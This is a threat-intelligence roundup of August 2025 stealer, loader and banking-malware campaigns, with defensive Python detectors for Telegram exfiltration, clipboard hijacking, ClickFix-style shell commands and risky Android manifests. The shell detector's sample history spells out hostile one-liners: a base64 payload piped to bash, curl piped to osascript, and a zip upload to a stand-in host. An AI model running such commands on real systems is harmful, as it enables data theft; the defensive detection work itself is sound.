
Executive Summary

August 2025 witnessed a sharp increase in stealer-focused campaigns, loader innovations, and abuse of trusted platforms across Windows, Android, and macOS environments. Multiple research disclosures highlighted how threat actors continue to evolve old codebases while adopting new distribution techniques.

Commodity Stealers Dominated: Families like Lumma, Rhadamanthys, PXA Stealer, Noodlophile, SalatStealer, and DarkCloud featured heavily in campaigns abusing cracked software sites, phishing emails, and Telegram-based staging. Their targets ranged from enterprise social media accounts to financial data and cryptocurrency wallets.

Loaders on the Rise: Emerging loaders such as XTinyLoader, QuirkyLoader, and HijackLoader refined the use of DLL side-loading, process hollowing, and staged payload delivery, often acting as the first stage for RATs and stealers.

Banking and RAT Campaigns: Advanced threats like GodRAT, PyLangGhost RAT, and Lazarus Android Stealer focused on financial institutions and mobile banking users, leveraging techniques like overlay attacks, steganography, and multi-stage shellcode injection.

macOS Under Fire: Campaigns including Odyssey Stealer (ClickFix) and SHAMOS (AMOS variant) demonstrated growing criminal focus on macOS users, using malvertising, fake help sites, and one-line install commands to bypass Gatekeeper and directly steal browser, Keychain, and crypto data.

Weaponized Utilities: The Tamperedchef campaign showed how fake productivity tools (PDF editors) were pushed through Google Ads, remaining dormant for weeks before activating credential theft features, a clear indicator of patient, large-scale operations.

Abuse of Legitimate Services: Attackers repeatedly leveraged Telegram, Google Ads, Dropbox, and even the Internet Archive to stage payloads and hide malicious traffic, making detection and takedown harder.

Real-World Infostealer Campaigns Observed in August

Fake Cheat Website Delivering Lumma Stealer

In August, researchers identified a malicious campaign masquerading as a cheat provider for popular online games under the brand DropCheats. The fraudulent website (dropcheats[.]net) mimicked a legitimate cheat/modding portal, offering “premium game mods” that promised undetectable hacks and regular updates to bypass anti-cheat systems.

Image Source : ShadowOpCode

The site was highly polished, complete with marketing slogans, a professional layout, and video demos of supposed cheats in action, making it convincing for unsuspecting gamers. Visitors were lured into downloading a ZIP archive (DropCheats.zip) hosted on MediaFire, which instead contained the Lumma Stealer malware.

Attack Flow

Initial Lure : Victims searching for game cheats land on the fake “DropCheats” site, which advertises hacks and mods for competitive games.

Malware Delivery : Clicking the download button fetches DropCheats.zip (≈52 MB) from MediaFire. The file appears as a legitimate cheat installer but actually drops Lumma Stealer.

Execution & Stealth : Once executed, Lumma Stealer harvests sensitive data, including:

  • Browser credentials, cookies, and autofill data
  • Cryptocurrency wallets and seed phrases
  • Discord/Telegram credentials for further spreading
  • System fingerprints and key files

Exfiltration : Stolen information is sent to the C2 server at mocadia[.]com. In some samples, Lumma is configured to upload via Telegram bots, further complicating tracking.

FSB Stealer: Fake CyberShield Masquerading as Russian State Antivirus

Researchers uncovered a new infostealer disguised as a fake Russian security product called КиберЩит (CyberShield), which claimed to be a joint development of Kaspersky Lab and the FSB (Federal Security Service of Russia).

The malware mimics a legitimate antivirus/antimalware GUI, using official-looking Russian insignia and patriotic branding to gain trust from local users. Instead of protecting systems, it silently collects sensitive data and exfiltrates it via Telegram bots.

Attack Flow

Lure : Fake Antivirus

  • Victims are tricked into downloading and running the “КиберЩит” program, believing it to be a state-backed security tool.
  • GUI mimics antivirus dashboards with scanning options and “threat detection.”

Execution : Malware Deployment

Malware is written in .NET and performs mock scanning while actually harvesting data.

Data Harvesting

  • Collects system and environment data:
    • Computer name, username, OS, installed antivirus.
    • IP address, country, city (geo-fingerprinting).
    • Running programs and timestamps.
  • Looks like a diagnostic scan report, but it’s staged for exfiltration.

Exfiltration

  • Config reveals Telegram bot integration:
    • BotToken, ChatID
    • File upload support, notifications
    • Retry/delay settings for persistence
  • Stolen files are uploaded directly to attacker-controlled Telegram chats.
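Both Lumma (in some samples) and FSB Stealer push stolen data out through Telegram bots, and every Bot API call carries the same URL shape (api.telegram.org/bot&lt;token&gt;/&lt;method&gt;). The following detector, an added example and not code from any of the reports summarised here, scans a constructed proxy log for outbound Bot API uploads and records the bot id for takedown while discarding the secret half of the token; the log format and token shape are assumptions for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Bot API calls take the form https://api.telegram.org/bot<token>/<method>.
# Token shape assumed here: numeric bot id, a colon, then a 30-50 character secret.
BOT_PATH = re.compile(r"^/bot(?P<token>\d{6,12}:[A-Za-z0-9_-]{30,50})/(?P<method>[A-Za-z]+)")

# Methods that push data out of the host; getUpdates/getMe would be inbound tasking or probes.
EXFIL_METHODS = {"sendDocument", "sendMessage", "sendPhoto", "sendVideo"}


@dataclass
class Finding:
    timestamp: str
    src_ip: str
    bot_id: str      # bot id only; the secret half of the token is never stored
    method: str
    bytes_sent: int


def parse_line(line: str) -> Optional[Tuple[str, str, str, str, str, int]]:
    """Constructed proxy log format: <ts> <src_ip> <verb> <url> <status> <request_bytes>."""
    parts = line.split()
    if len(parts) < 6 or not parts[5].isdigit():
        return None
    ts, src, verb, url, status, size = parts[:6]
    return ts, src, verb, url, status, int(size)


def scan_proxy_log(lines: List[str], min_upload_bytes: int = 0) -> List[Finding]:
    """Return one Finding per outbound Bot API upload seen in the log."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, verb, url, _status, size = rec
        parts = urlsplit(url)
        if parts.hostname != "api.telegram.org":
            continue
        m = BOT_PATH.match(parts.path)
        if m is None:
            continue
        method = m.group("method")
        if verb != "POST" or method not in EXFIL_METHODS or size < min_upload_bytes:
            continue
        bot_id = m.group("token").split(":", 1)[0]   # keep the id, drop the secret
        findings.append(Finding(ts, src, bot_id, method, size))
    return findings


# Constructed sample log: two uploads from one host, one harmless API probe, one unrelated site.
SAMPLE_LOG = [
    "2025-08-12T09:14:03Z 10.0.5.21 POST https://api.telegram.org/bot7234567890:AAHconstructedSecretValue0000000000/sendDocument 200 184320",
    "2025-08-12T09:14:05Z 10.0.5.21 POST https://api.telegram.org/bot7234567890:AAHconstructedSecretValue0000000000/sendMessage 200 412",
    "2025-08-12T09:20:41Z 10.0.5.44 GET https://api.telegram.org/bot1122334455:AAHanotherConstructedSecret00000000/getMe 200 0",
    "2025-08-12T09:21:10Z 10.0.5.44 POST https://example.com/api/upload 200 98000",
]

if __name__ == "__main__":
    for f in scan_proxy_log(SAMPLE_LOG):
        print(f"{f.timestamp} {f.src_ip} -> bot {f.bot_id} {f.method} ({f.bytes_sent} bytes)")
```

Raising min_upload_bytes filters out small status messages and leaves only document uploads, which is usually the event worth paging on.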

PXA Stealer - Telegram-Driven, Multi-Stage Campaign

PXA Stealer is a Python-based infostealer linked to Vietnamese-speaking cybercriminal groups. Active since late 2024, the campaign has evolved into a multi-stage infection chain that hides behind legitimate signed apps and decoy documents. By abusing trusted binaries like Haihaisoft PDF Reader and Microsoft Word 2013, attackers sideload malicious DLLs that drop the final Python payload.

Image source : sentinelone.com

When launched, the app sideloads the DLL, which:

  1. Opens a benign decoy document to trick the user.
  2. Runs certutil to decode an embedded archive disguised as a PDF.
  3. Uses a renamed WinRAR tool (images.png) to silently unpack payloads.
  4. Drops a Python interpreter (svchost.exe) and obfuscated script.
  5. Ensures persistence with a Registry key and begins data theft.

The final payload steals browser logins, cookies, autofill data, crypto wallets, VPN credentials, and messenger artifacts, then exfiltrates everything to Telegram channels, often through Cloudflare Workers for cover.

Android Malware Campaign Targets Indian Banking Users

Image source : www.mcafee.com

Security researchers found a new Android malware campaign mainly hitting Hindi-speaking users in India. The attackers set up phishing websites that look like official bank pages for SBI Card, Axis Bank, IndusInd Bank, and others. These fake sites trick people into downloading a malicious app that pretends to be a banking update or Google Play update.

Once installed, the malware does two things at once:

  • Steals financial data : It shows fake banking screens asking for personal and card details (name, number, CVV, expiry date). The stolen info is then sent to the attacker’s servers.
  • Mines cryptocurrency in the background : Using a built-in miner based on XMRig, the malware secretly uses the victim’s phone to mine Monero, which slows the device down and causes it to overheat.

SalatStealer (aka WEB_RAT) Dropped by Amadey

A fresh wave of SalatStealer infections has been observed, with Amadey malware acting as the main delivery vector. SalatStealer (also tracked as WEB_RAT) is a growing infostealer family that comes with its own admin panel hosted behind Cloudflare (salat[.]cn/login) and even public code releases via GitHub (importantfiles repository).

The campaign shows a pattern where Amadey acts as a loader, dropping SalatStealer onto compromised systems. Once active, the stealer gathers sensitive information such as browser credentials, cookies, crypto wallets, Discord/Telegram tokens, and system details. The data is exfiltrated to attacker-controlled panels where operators can manage logs and victims at scale.

PyLangGhost RAT - Lazarus Group’s New Stealer Targeting Finance & Tech

Researchers have uncovered a new malware called PyLangGhost RAT, linked to North Korea’s Lazarus subgroup Famous Chollima. This threat is a Python-based rework of the older GoLangGhost RAT and is being used in highly targeted attacks against the finance, cryptocurrency, and technology industries.

Image source : BlockOSINT

The attackers don’t spread this malware through random phishing or pirated apps. Instead, they use fake job interviews and staged online meetings. Victims are tricked with fake errors (like “camera not detected”) during interviews. To “fix” the issue, they are told to run a script which secretly installs the RAT and hands over control of their system.

Once active, PyLangGhost RAT can:

  • Steal browser credentials, cookies, and crypto wallet data (MetaMask, Phantom, Coinbase Wallet, etc.)
  • Open a reverse shell to run attacker commands
  • Upload and download files from the victim’s system
  • Use registry keys for persistence
  • Communicate with its C2 servers over raw IP addresses

The malware modules (like nvidia.py, config.py, api.py, and command.py) handle persistence, communication, credential theft, and automation. It even bypasses Chrome’s latest encryption protections by impersonating system processes to extract master keys.

XTinyLoader - Modular Loader and Stealer

A new malware family named XTinyLoader is spreading through fake cracked software. Unlike older single-purpose loaders, this one doubles as both a loader and an infostealer.

Once installed, XTinyLoader copies itself into the Windows ProgramData directory and creates a registry Run key to ensure persistence. It uses a mutex check so that only one instance runs at a time. The malware then begins monitoring the system clipboard for cryptocurrency wallet addresses. If it detects Bitcoin, Ethereum, Tron, or Litecoin addresses, it swaps them with attacker-controlled wallets. At the same time, it gathers system information from the infected host and sends it back to a command-and-control server.

XTinyLoader also has dropper functionality. It downloads extra files from attacker infrastructure, stores them on disk, and executes them. Some of these additional payloads are Python scripts that search folders for crypto wallet strings and replace them with new ones. Another variant of the loader can fetch a DLL and inject it into browsers such as Chrome, Brave, and Firefox. This DLL intercepts browser activity to collect sensitive information directly from the victim’s machine.
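XTinyLoader's clipboard hijack only works if the swapped-in address passes for the one the user copied, so a defensive monitor can key on exactly that: the clipboard now holds a different address of the same chain as the last thing the user copied. The code below is an added example, not XTinyLoader's code or any vendor's; the address patterns are simplified shape checks (no checksum validation), and the copy/clipboard event stream stands in for what a real copy hook and clipboard poller would feed it.

```python
import re
from typing import Iterable, List, Optional, Tuple

# Simplified address shapes (assumption: good enough to classify, not to validate checksums).
ADDRESS_PATTERNS = {
    "BTC": re.compile(r"^(bc1[a-z0-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$"),
    "ETH": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "TRX": re.compile(r"^T[a-km-zA-HJ-NP-Z1-9]{33}$"),
    "LTC": re.compile(r"^(ltc1[a-z0-9]{25,62}|[LM][a-km-zA-HJ-NP-Z1-9]{26,33})$"),
}


def classify(text: str) -> Optional[str]:
    """Return the chain a string looks like, or None if it is not a wallet address."""
    text = text.strip()
    for chain, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return chain
    return None


def detect_swaps(events: Iterable[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """events: ("copy", text) when the user copied text; ("clipboard", text) when the clipboard was polled.
    A swap is a polled value that is a different address of the same chain as the last user copy."""
    alerts = []
    last_copied = None
    for kind, text in events:
        text = text.strip()
        if kind == "copy":
            last_copied = text          # what the user actually put on the clipboard
            continue
        if kind != "clipboard" or last_copied is None or text == last_copied:
            continue                    # nothing copied yet, or clipboard untouched
        chain = classify(last_copied)
        if chain is not None and classify(text) == chain:
            alerts.append((chain, last_copied, text))   # same chain, different address: hijack
    return alerts


# Constructed addresses: they pass the shape check only and are not real wallets.
USER_BTC = "bc1q" + "userwallet" + "0" * 28
SWAP_BTC = "bc1q" + "swappedwallet" + "0" * 25
USER_ETH = "0x" + "a" * 40
SWAP_ETH = "0x" + "b" * 40

SAMPLE_EVENTS = [
    ("copy", USER_BTC),
    ("clipboard", USER_BTC),            # unchanged: fine
    ("clipboard", SWAP_BTC),            # replaced with another BTC address: alert
    ("copy", "meeting at 10am"),
    ("clipboard", "meeting at 10am"),   # not an address: ignored
    ("copy", USER_ETH),
    ("clipboard", SWAP_ETH),            # replaced with another ETH address: alert
]

if __name__ == "__main__":
    for chain, wanted, got in detect_swaps(SAMPLE_EVENTS):
        print(f"{chain} clipboard swap: copied {wanted} but clipboard holds {got}")
```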

According to MalwareBazaar telemetry, the first samples of XTinyLoader were seen on July 26, 2025, with activity peaking in early August before tapering off by August 14, 2025.

DarkCloud Stealer Adopts ConfuserEx and VB6 Payload Chain

Image Source : unit42.paloaltonetworks.com

Researchers recently observed a new infection chain for DarkCloud Stealer, showing how the malware family is evolving to avoid detection. The campaign starts with phishing emails carrying compressed attachments such as TAR, RAR, or 7Z files. These archives contain obfuscated JavaScript or WSF scripts that act as the first-stage downloader.

Image Source : unit42.paloaltonetworks.com

Once executed, the scripts fetch a PowerShell payload from attacker-controlled open directory servers. The PowerShell code is layered with Base64 and AES encryption, making it harder for analysts to read. It then drops a ConfuserEx-protected .NET executable that launches the next stage.

The loader uses process hollowing to inject the final DarkCloud Stealer payload, which is written in VB6. The payload itself is further protected with RC4 string encryption and contains logic to capture credentials, card data, and system details.

This updated chain shows that DarkCloud’s operators are combining multi-stage loaders with obfuscation tools like ConfuserEx to stay ahead of traditional defenses and frustrate researchers trying to analyze their malware.

Minecraft Mod Lure Drops NjRat Trojan on Gamers

Image Source : www.pointwild.com

A recent malware campaign took advantage of the Minecraft movie hype by disguising a malicious program as a free version of the game called “Eaglercraft 1.12 Offline.” At first glance it looked harmless, and when people installed it a working browser-based Minecraft game actually launched, keeping players distracted. Behind the scenes, however, it secretly installed NjRat, a dangerous type of malware that gives attackers full control of the victim’s computer.

Image Source : www.pointwild.com

The malware was first detected when security analysts investigated a suspicious installer file. They noticed it carried a fake Microsoft digital signature and unusual hidden files. When run in a controlled environment, it not only launched the Minecraft clone but also dropped hidden programs with names like WindowsServices.exe and Client.exe. These quietly connected to attacker servers and set up ways to make sure the malware would restart every time the computer was turned on.

To make matters worse, NjRat included anti-investigation tricks. If it detected that someone was trying to monitor it with security tools such as Wireshark or Process Hacker, it could deliberately crash the computer with a blue screen of death (BSOD). This makes analysis harder and helps the malware stay under the radar.

This campaign shows how attackers use popular games and trends as bait. By disguising malware as a fun Minecraft clone, they managed to target kids, students, and casual gamers, groups less likely to question where they download software from.

Rhadamanthys Stealer via ClickFix

A new wave of ClickFix phishing campaigns is delivering Rhadamanthys Stealer, showing how attackers are combining social engineering with stealthy loaders to bypass defenses. Victims are lured into executing a malicious MSI installer, which silently deploys the stealer in memory. Unlike older ClickFix operations that mostly dropped NetSupport RAT or AsyncRAT, this one stands out for using a C++-based infostealer with advanced evasion and data theft features.

Once active, the infection chain hides itself under user profile directories, performs anti-VM checks to evade sandboxes, and abuses a compromised system file to launch encrypted communications. Instead of relying on domains, it connects directly to attacker IPs using TLS with self-signed certificates, which makes detection harder but also creates unique hunting artifacts.

A later stage uses a PNG image with steganography to deliver additional payloads. This layering of technical tricks with social engineering makes Rhadamanthys one of the more resilient stealer campaigns seen in recent months.

Lazarus Stealer (Android) - Russian Bank Credential Theft via Overlays & SMS

Image Source : www.cyfirma.com

Lazarus Stealer is a piece of Android malware that pretends to be a harmless app called GiftFlipSoft. Once installed, it hides itself so the user can’t see it on the home screen or in the list of recent apps. Its real goal is to steal banking details from Russian users.

To do this, it asks for very powerful permissions. It tries to make itself the default SMS app, so it can read and send text messages, including one-time passwords (OTPs) from banks. It also asks for the ability to draw over other apps, which lets it place a fake login screen on top of a real banking app. When the victim enters their card number, PIN, or password, the fake screen captures it.

Image Source : www.cyfirma.com

The malware constantly runs in the background, watching which apps are open and stealing data in real time. It regularly sends stolen information like banking details, OTPs, and device info to a remote command-and-control server. From there, attackers can also send instructions, like telling the phone to send specific SMS messages.

HijackLoader - How Pirate Game “Cracks” Lead to Multi Stage Infections

Hackers are using pirated game downloads as a trap to spread malware called HijackLoader. Many people believe these sites are safe if an ad blocker is used, but that is not true. Even with protection, clicking a game link leads you through shady redirect sites until you finally land on a MEGA download.

The file looks like a normal game crack but actually contains hidden malware. Inside the package is a huge file named DivXDownloadManager.dll (over 500 MB). The size is artificial: the file is padded to stop people from uploading it to antivirus or online scanners. Once this file is opened, the malicious code inside starts working.

The loader reads extra hidden files (like quintillionth.ppt, paraffin.html), decrypts them, and then injects code into real Windows files such as shell32.dll. From there, it builds itself up step by step, adding modules that help it hide from antivirus, check if it’s running inside a virtual machine, and trick security tools.

For persistence, HijackLoader creates shortcuts or scheduled tasks so it runs every time the computer starts. The final stage depends on what the hackers want: it can install password stealers, crypto-wallet stealers, RATs (remote access tools), or even crypto-mining software.

Noodlophile Stealer’s New Tactics: Fake Copyright Emails Target Enterprises

A new version of the Noodlophile Stealer malware is being used in cyberattacks against companies with big social media footprints, especially those active on Facebook. Hackers send fake emails claiming a business has violated copyright rules on its Facebook page. These emails look convincing because they include real details about the company, like Page IDs and ownership info, making victims believe they are genuine.

Image source : www.morphisec.com

The emails pressure employees to download a “copyright evidence” file, but instead of proof, it contains malware. Once opened, it installs Noodlophile Stealer, a program that secretly steals saved browser data, Facebook cookies, credit card details, and other sensitive information.

What makes this campaign dangerous is that attackers now use legitimate apps with hidden weaknesses to load the malware, plus tricks like Telegram-based commands and disguising files as documents or images. This makes it harder for normal security systems to catch.

Odyssey Stealer: ClickFix Malware Targets macOS Users for Credentials and Crypto Wallets

Image Source : www.forcepoint.com

Researchers have uncovered a new phishing campaign delivering Odyssey Stealer using the ClickFix technique, previously seen on Windows but now adapted for macOS. The attack relies on a fake CAPTCHA page that tricks users into copying and pasting malicious commands into their terminal.

Once executed, a base64-encoded script fetches an obfuscated AppleScript payload. This script silently collects sensitive data including browser cookies, saved logins, crypto wallet extensions, Apple Notes, and Keychain files.

Odyssey Stealer then compresses all stolen data into /tmp/out.zip and exfiltrates it to its C2 server (45.146.130[.]131). After upload, it cleans traces by deleting temporary files, making forensic investigation harder.

The campaign highlights how attackers are shifting from classic binary droppers to pure social engineering and script-based attacks, bypassing many traditional detection methods.

QuirkyLoader - A New Malware Loader on the Rise

IBM X-Force has identified QuirkyLoader, a new malware loader first spotted in late 2024, now actively delivering well-known threats like Agent Tesla, AsyncRAT, FormBook, MassLogger, Remcos, Rhadamanthys, and Snake Keylogger.

Image Source : www.ibm.com

The attack begins with phishing emails carrying a malicious archive. Inside the archive are three elements: a legitimate executable, an encrypted payload, and a malicious DLL. When the user runs the legitimate program, it triggers DLL side-loading, silently executing the malicious DLL. This DLL decrypts and injects the final payload into system processes, often by hollowing trusted executables like AddInProcess32.exe, InstallUtil.exe, or aspnet_wp.exe.

What makes QuirkyLoader notable is its .NET DLL loader modules compiled with Ahead-of-Time (AOT). This technique makes the binary appear like native C/C++ code, complicating detection. One variant even used the Speck-128 cipher in CTR mode, an unusual encryption choice for malware, to decrypt payloads.

Recent campaigns have been observed in Taiwan (targeting Nusoft employees) and Mexico (random individuals), with payloads ranging from info-stealers to RATs.

Internet Archive Exploited in Stealthy Remcos RAT Campaign

Researchers have uncovered a new malware delivery chain that abuses the Internet Archive (archive.org) to host and deliver malicious payloads. This technique demonstrates how attackers increasingly hide behind trusted services to evade detection and bypass security tools.

Image Source : @vmray

The attack starts with a JScript loader, which runs a PowerShell script. This script retrieves a seemingly harmless PNG image file from the Internet Archive. Hidden inside the image is an obfuscated .NET loader, encoded within the RGB values of individual pixels, a classic steganography trick.

Image Source : @vmray

Once extracted and executed, the .NET loader establishes persistence via the Windows Registry and then launches the Remcos RAT, a widely used remote access trojan. The final payload connects to its command-and-control (C2) infrastructure through Duck DNS, a free dynamic DNS provider, making the traffic look legitimate at first glance.

This abuse of the Internet Archive highlights how public trust in well-known services can be weaponized to deliver sophisticated malware while staying under the radar.

GodRAT - A New RAT Targeting Financial Firms

GodRAT is a new type of malware that targets financial companies, especially trading and brokerage firms. Attackers send fake files over Skype, disguised as financial reports or documents. These files look normal but actually contain hidden code inside images, a trick called steganography.

Image source : securelist.com

When opened, the hidden code secretly downloads GodRAT from the attacker’s server. Once inside, it gives hackers full control of the victim’s computer: they can browse files, steal saved browser passwords, and even drop more malware like AsyncRAT.

GodRAT is based on the old Gh0st RAT malware family, but it has been updated with new tricks. For example, it uses expired but legitimate-looking certificates and a special “-Puppet” command to stay hidden.

So far, attacks have been seen in Hong Kong, UAE, Jordan, Lebanon, and Malaysia, with activity continuing into mid-2025.

COOKIE SPIDER’s SHAMOS Campaign on macOS

Between June and August 2025, CrowdStrike detected and blocked a campaign where the cybercriminal group COOKIE SPIDER tried to spread SHAMOS, a variant of the Atomic macOS Stealer (AMOS).

Image source : www.crowdstrike.com

The attackers relied on malvertising (fake ads that appeared in Google search results) and spoofed GitHub repositories to trick users looking for macOS help or software. Victims were shown fake “support” instructions that told them to paste a one-line command into their Terminal.

That single command silently downloaded SHAMOS, bypassing Apple’s Gatekeeper protections. Once active, the malware collected sensitive data including browser logins, Apple Keychain credentials, notes, and cryptocurrency wallet files. It also dropped fake apps (like a spoofed Ledger wallet) and a botnet module for long-term control. To stay hidden, SHAMOS used obfuscation tricks and exfiltrated stolen data in a compressed ZIP archive via curl.

This campaign shows how attackers are adapting social engineering with simple but powerful techniques. By abusing trusted platforms like Google Ads and GitHub, they made their malicious tools look convincing and easy for victims to run. For enterprises and individuals alike, this highlights the danger of blindly trusting “quick fixes” found online.
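Odyssey Stealer and SHAMOS both begin with a single pasted terminal command and end with a zipped archive leaving via curl, which gives a defender a small set of command-line shapes to hunt for in shell history or process telemetry. The rule set below is an added example (not Forcepoint's, CrowdStrike's, or any vendor's detection content) run over a constructed command history; the rule patterns, the example.invalid hosts, and the base64 blob are assumptions constructed for this example.

```python
import re
from typing import List, Tuple

# Each rule is (id, regex over one shell command line). Patterns are constructed for this example.
RULES = [
    ("B64_TO_SHELL", re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:sh|bash|zsh)\b")),
    ("REMOTE_TO_SHELL", re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sh|bash|zsh)\b")),
    ("ECHO_B64_DECODE", re.compile(r"\becho\s+[A-Za-z0-9+/=]{40,}\s*\|\s*base64\s+(?:-d|-D|--decode)")),
    ("REMOTE_OSASCRIPT", re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*osascript\b")),
    ("ZIP_UPLOAD_CURL", re.compile(r"\bcurl\b.*(?:-F|-d|--data-binary|-T|--upload-file)\s*\S*/tmp/\S+\.zip")),
]


def score_command(cmd: str) -> List[str]:
    """Return the ids of every rule the command trips, in RULES order."""
    return [rule_id for rule_id, rx in RULES if rx.search(cmd)]


def triage(history: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (command, matched rule ids) for every command that trips at least one rule."""
    out = []
    for cmd in history:
        hits = score_command(cmd)
        if hits:
            out.append((cmd, hits))
    return out


# Constructed 48-character base64-looking blob; it is not a payload.
B64_BLOB = "Q0xJQ0tGSVg=" * 4

# Constructed history: three benign commands mixed with the three stages described above.
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "base64 -d notes.b64 > notes.txt",                             # decode to a file, no shell
    f"echo {B64_BLOB} | base64 -d | bash",                         # ClickFix one-liner shape
    "curl -fsSL http://example.invalid/update.scpt | osascript",   # remote AppleScript stage
    'curl -X POST -F "file=@/tmp/out.zip" http://example.invalid/upload',   # zipped exfil
    "curl -sS https://example.com/file.tar.gz -o file.tar.gz",     # ordinary download
]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_HISTORY):
        print(f"{', '.join(hits)}: {cmd}")
```

The same rules apply to EDR process-creation events for the user's shell, which is the better source because zsh history can be disabled or edited by the script that ran.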

How Anatsa’s Fake Apps Spread on Google Play

The Anatsa malware, also known as TeaBot, has been around since 2020 as an Android banking trojan that steals logins, monitors keystrokes, and helps attackers move money from victims’ accounts. In its latest campaigns, Anatsa hides inside fake apps on the Google Play Store, often disguised as document readers. Some of these apps have been downloaded tens of thousands of times, making the threat widespread.

Image Source : www.zscaler.com

This new version has grown more dangerous: it now targets over 831 financial institutions worldwide, including banks, brokerages, and even crypto platforms in regions like Germany, South Korea, and the U.S. Once installed, it requests accessibility permissions that allow it to silently grab SMS messages, pop up fake banking login pages, and steal sensitive data.
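Lazarus Stealer (default-SMS role plus overlay and usage access) and Anatsa (an accessibility service) each depend on a combination of manifest-declared capabilities that a legitimate document reader or gift app has no reason to request. The checker below is an added example, not code from CYFIRMA, Zscaler, or either malware family: it reads a decoded AndroidManifest.xml and reports those indicator combinations; the two manifests are constructed for this example and the component names in them are invented.

```python
import xml.etree.ElementTree as ET
from typing import List

ANDROID = "{http://schemas.android.com/apk/res/android}"
SMS_PERMS = {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS", "android.permission.SEND_SMS"}


def a(el, name):
    """Read an android:-namespaced attribute."""
    return el.get(ANDROID + name)


def assess_manifest(xml_text: str) -> List[str]:
    """Return indicator ids found in a decoded AndroidManifest.xml."""
    root = ET.fromstring(xml_text)
    findings = []
    perms = {a(e, "name") for e in root.iter("uses-permission")}
    actions = {a(e, "name") for e in root.iter("action")}

    if "android.permission.SYSTEM_ALERT_WINDOW" in perms:
        findings.append("OVERLAY_PERMISSION")            # can draw a fake login over a banking app
    if perms & SMS_PERMS:
        # an SMS_DELIVER receiver is one of the components needed to be offered the default-SMS role
        if "android.provider.Telephony.SMS_DELIVER" in actions:
            findings.append("DEFAULT_SMS_ROLE_CANDIDATE")
        else:
            findings.append("SMS_PERMISSIONS")
    if "android.permission.PACKAGE_USAGE_STATS" in perms:
        findings.append("USAGE_ACCESS")                  # lets the app see which app is in the foreground
    if any(a(s, "permission") == "android.permission.BIND_ACCESSIBILITY_SERVICE"
           for s in root.iter("service")):
        findings.append("ACCESSIBILITY_SERVICE")         # Anatsa-style screen reading and input control

    has_launcher = any(
        "android.intent.action.MAIN" in {a(x, "name") for x in act.iter("action")}
        and "android.intent.category.LAUNCHER" in {a(x, "name") for x in act.iter("category")}
        for act in root.iter("activity"))
    if not has_launcher:
        findings.append("NO_LAUNCHER_ICON")              # nothing for the user to find on the home screen
    return findings


# Constructed manifest combining the Lazarus Stealer and Anatsa indicators.
SUSPICIOUS_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.constructed.sample">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.PACKAGE_USAGE_STATS"/>
  <application android:label="GiftFlipSoft">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name=".SmsReceiver" android:permission="android.permission.BROADCAST_SMS">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_DELIVER"/>
      </intent-filter>
    </receiver>
    <service android:name=".A11yService" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
  </application>
</manifest>"""

# Constructed control: an ordinary app with a launcher icon and only network access.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.constructed.reader">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Reader">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

if __name__ == "__main__":
    print(assess_manifest(SUSPICIOUS_MANIFEST))
    print(assess_manifest(BENIGN_MANIFEST))
```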

Tamperedchef Campaign: The Malicious PDF Editor Scam

Image Source : www.truesec.com

Security researchers uncovered a large-scale campaign distributing a trojanized PDF editor called AppSuite PDF Editor. Promoted through multiple websites and even Google Ads campaigns, the app appeared legitimate but secretly contained a backdoor. Initially, the program behaved harmlessly, tricking users into trusting it. However, after about two months, it received an update that activated its malicious features, a stealer dubbed Tamperedchef.

Tamperedchef establishes persistence through registry keys, queries browser databases for saved credentials, and forcefully terminates browsers to unlock stored data. The malware also checks for installed security products before exfiltrating information. Investigations revealed that the PDF editor was signed with digital certificates from several suspicious companies, some likely AI-generated fronts. This points to a threat actor with a long history of disguising malicious utilities as free productivity tools, previously linked to other unwanted software like OneStart and Epibrowser. The campaign primarily impacted organizations across Europe and shows how ad-driven distribution of fake utility apps can rapidly infect enterprise environments.

Exploit and Delivery Vectors Deep Dive

Lumma Stealer

  • Vector: A fake game cheat website (dropcheats[.]net) distributing malicious ZIP archives.
  • Method: The ZIP file (DropCheats.zip) downloaded from MediaFire contained the Lumma Stealer payload disguised as game cheat software.
  • Payload:
    • Browser credentials, cookies, autofill data, and crypto wallets.
    • System information, clipboard contents, and common document/file types.
  • Key Trick:
    • Abuse of popular cheat-themed lures to target gamers.
    • Cloud hosting (MediaFire) used to evade detection and increase trust.
    • Communication with C2 server at mocadia[.]com for exfiltration.

FSB Stealer

  • Vector: Distributed as a fake antivirus/security tool branded as “КиберЩит (CyberShield),” falsely claiming to be developed by Kaspersky and the FSB.
  • Method: .NET-based executable with a GUI mimicking a legitimate antivirus dashboard; provides fake scanning and protection features while secretly harvesting data.
  • Payload:
    • System info: computer name, username, OS version, installed AV.
    • Network info: IP address, country, city.
    • Execution details: program name, launch time.
    • Potential file theft based on configurable targets/extensions.
